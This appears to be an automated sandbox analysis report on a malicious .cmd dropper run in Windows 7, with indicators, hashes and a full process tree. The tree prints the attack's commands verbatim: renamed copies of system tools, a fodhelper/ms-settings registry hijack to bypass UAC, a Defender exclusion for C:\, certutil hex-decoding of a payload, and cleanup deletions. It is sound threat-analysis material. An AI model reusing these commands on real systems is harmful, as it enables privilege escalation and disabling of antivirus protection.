Analysis

  • max time kernel
    147s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-05-2024 09:54

General

  • Target

    17173318465.zip

  • Size

    1002KB

  • MD5

    ed0ed615d8c62f8a55f9b6d56b3b8aff

  • SHA1

    c91b96e4775a686c2bfcae1a9d8eb9f744de995a

  • SHA256

    99c9604c43f258385150f75b5df3e7d7a4a2c5364ed7d0ce592a90ea3b076323

  • SHA512

    db6fd59264b8fd3964235605c5eebad17bf4ac4caf111c84eb1689ebb42bb18a15cc36fc6d9361ab85bc02d165f14515ef3945c5ad34fe51bdb8af03a91e8c05

  • SSDEEP

    24576:m4SvFvkv07m+98vcV8+TPbk7ImwqtfK9f+hYz3G3Y/ummbLv:m4kFMc7398vwTRm9okOz3G3cov

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17173318465.zip
    1⤵
      PID:2812
    • C:\Windows\system32\verclsid.exe
      "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
      1⤵
        PID:2152
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17173318465.zip"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2964
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\System32\extrac32.exe
          C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
          2⤵
            PID:2688
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
            2⤵
            • Executes dropped EXE
            PID:2572
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
            2⤵
            • Executes dropped EXE
            PID:2528
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2544
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              3⤵
                PID:2596
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3048
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                3⤵
                  PID:2148
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1688
                • C:\Windows\system32\extrac32.exe
                  extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                  3⤵
                    PID:1168
                • C:\Windows\System32\extrac32.exe
                  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\WSReset.exe "C:\\Windows \\System32\\itsme.exe"
                  2⤵
                    PID:2184
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2864
                    • C:\Windows\system32\extrac32.exe
                      extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                      3⤵
                        PID:2828
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:2892
                      • C:\Users\Public\xkn.exe
                        C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2896
                        • C:\Users\Public\alpha.exe
                          "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1468
                          • C:\Users\Public\ger.exe
                            C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                            5⤵
                            • Executes dropped EXE
                            • Modifies registry class
                            PID:308
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1676
                      • C:\Users\Public\kn.exe
                        C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                        3⤵
                        • Executes dropped EXE
                        PID:1572
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1608
                      • C:\Users\Public\kn.exe
                        C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                        3⤵
                        • Executes dropped EXE
                        PID:2764
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1968
                      • C:\Windows\system32\taskkill.exe
                        taskkill /F /IM SystemSettings.exe
                        3⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1952
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                      2⤵
                      • Executes dropped EXE
                      PID:2620
                      • C:\Windows\system32\PING.EXE
                        ping 127.0.0.1 -n 2
                        3⤵
                        • Runs ping.exe
                        PID:1632
                    • C:\Users\Public\Libraries\sppsvc.pif
                      C:\Users\Public\Libraries\sppsvc.pif
                      2⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1428
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 696
                        3⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:1936
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                      2⤵
                      • Executes dropped EXE
                      PID:1772
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                      2⤵
                      • Executes dropped EXE
                      PID:2044
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                      2⤵
                      • Executes dropped EXE
                      PID:1212
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:2260
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:2328
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:1508
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:1904
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:1076

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd
    Filesize: 3.2MB
    MD5: 366a8d4073f8409849e001e7feb3d894
    SHA1: 207a1fc1e41e3e7776511e692a9cb166d59d2d13
    SHA256: 5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3
    SHA512: f262b68076974242a84fdd0b301a2307d550dfd9f884801902974e29f0a3d2dc0699e5aaad2c319e6aec87bcdf5190bc11cc938fc69d9668e3b85c57ed0ea51f

  • C:\Users\Public\Libraries\sppsvc.pif
    Filesize: 1.1MB
    MD5: e62ff91b6b729d830b15d8f81bc57ede
    SHA1: 38b3ac66c5899d0de5a91f66ecee1cb6e95b2973
    SHA256: 33a072ab2cc4195ed145081a2c88f2b000bdcae9c4b5989c7e9013feabb6ec59
    SHA512: 9ef30e503f09061a72560a384dd25c5028db46154cce430c1db7149cc697c795f86effd691167d61606402927087d0dc34366487ae7714b650bd42919e558d1f

  • C:\Users\Public\sppsvc.rtf
    Filesize: 2.2MB
    MD5: 8ab8b1cab45b50b97ff80bff5e10291a
    SHA1: 966cd90ae89517d31fecc7bfaccec8703ddecfdb
    SHA256: 9b6ed53256341d48bc5981e48c8bb1e7547928143af4b33f0433468c7a4e11fd
    SHA512: 02adb968d9a6153fd055cff48aaa7c2328d41a5a14b88b7509955903a12e5c7a07ade608a7ffb54d9bfebe243a7f01d5c9655dcd3276110f32e5ee0b2c322cdf

  • \Users\Public\alpha.exe
    Filesize: 337KB
    MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
    SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
    SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
    SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

  • \Users\Public\ger.exe
    Filesize: 73KB
    MD5: 9d0b3066fe3d1fd345e86bc7bcced9e4
    SHA1: e05984a6671fcfecbc465e613d72d42bda35fd90
    SHA256: 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
    SHA512: d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

  • \Users\Public\kn.exe
    Filesize: 1.1MB
    MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
    SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
    SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
    SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

  • \Users\Public\xkn.exe
    Filesize: 462KB
    MD5: 852d67a27e454bd389fa7f02a8cbe23f
    SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
    SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
    SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • memory/1428-69-0x0000000000400000-0x0000000000522000-memory.dmp
    Filesize: 1.1MB

  • memory/2896-33-0x000000001B7D0000-0x000000001BAB2000-memory.dmp
    Filesize: 2.9MB

  • memory/2896-34-0x0000000000280000-0x0000000000288000-memory.dmp
    Filesize: 32KB